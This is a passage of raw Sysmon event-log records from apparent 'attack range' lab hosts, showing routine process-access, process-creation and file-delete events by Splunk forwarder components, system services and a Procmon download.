Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000218240Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:49.378{4F8D34B0-13A5-6216-9C04-000000003902}1884C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000218271Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:50.831{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=47BB39AAD53C4B4320A473834DFC51D7,SHA256=BE7646E3D6EC81AB08C8F22D9BEDA64CC86D828B7D2E26BD8D387AD52DF82CA3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293864Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:50.250{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5EEE6468D24D1BAD11B268E26CE0639D,SHA256=32EB527FEA099EFE8E3E9BC0913533B4868A79039CA6B86F9AB08DA6FC3ED245,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218270Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:50.409{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7F962E577EDC8E58B3015DDA3BB76221,SHA256=2EC0B0EF083EA156BEA9C3672733A91B728DBE1887C04C2835DABA9018ADDFF6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000218269Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:50.206{4F8D34B0-13A5-6216-9D04-000000003902}3512292C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293868Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:51.403{C8EA50B7-F2AD-6215-C000-000000003802}48561796C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+63325|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293867Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:51.403{C8EA50B7-F2AD-6215-C000-000000003802}48561796C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6323e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293866Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:51.403{C8EA50B7-F2AD-6215-C000-000000003802}48561796C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63207|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000293865Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:51.272{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0AFBEB45EF600083E8BC87A0B28575CC,SHA256=41FEC79EBC1D1C7A7A63C7204CD6698A4D6D582AEE017B53912AAE18D682F5D4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000218284Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:51.425{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-13A7-6216-9E04-000000003902}1836C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218283Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:51.425{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218282Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:51.425{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218281Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:51.425{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218280Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:51.425{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218279Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:51.425{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218278Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:51.425{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218277Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:51.425{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218276Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:51.425{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218275Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:51.425{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218274Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:51.425{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-13A7-6216-9E04-000000003902}1836C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000218273Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:51.425{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-13A7-6216-9E04-000000003902}1836C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000218272Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:51.425{4F8D34B0-13A7-6216-9E04-000000003902}1836C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000218286Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:52.440{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2A10EEF92013DC7842A5F90237BEFBF9,SHA256=D2B42AF9FBE0BBD07480D2F28342F367C52F3C1506BD15040D6F0D339FF817EC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218285Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:52.065{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=725DB9FECC14D107F52ADEC1F5F157FF,SHA256=4D242B50C21544059A07ABA1E6505CB44696E0E399B52BCDC0FEFD81DBF9217B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293875Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:52.281{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F944D23E6102E4A706243FE4186975F,SHA256=BAE28EF977478D21B46B9E2E8CDBD0A2A138234662F2E3B1E17CC1E787FC13AE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000293874Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:52.181{C8EA50B7-F2AD-6215-C000-000000003802}48561796C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+63325|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293873Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:52.181{C8EA50B7-F2AD-6215-C000-000000003802}48561796C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6323e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293872Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:52.181{C8EA50B7-F2AD-6215-C000-000000003802}48561796C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63207|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293871Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:52.097{C8EA50B7-F2AD-6215-C000-000000003802}48561796C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+63325|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293870Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:52.097{C8EA50B7-F2AD-6215-C000-000000003802}48561796C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6323e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293869Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 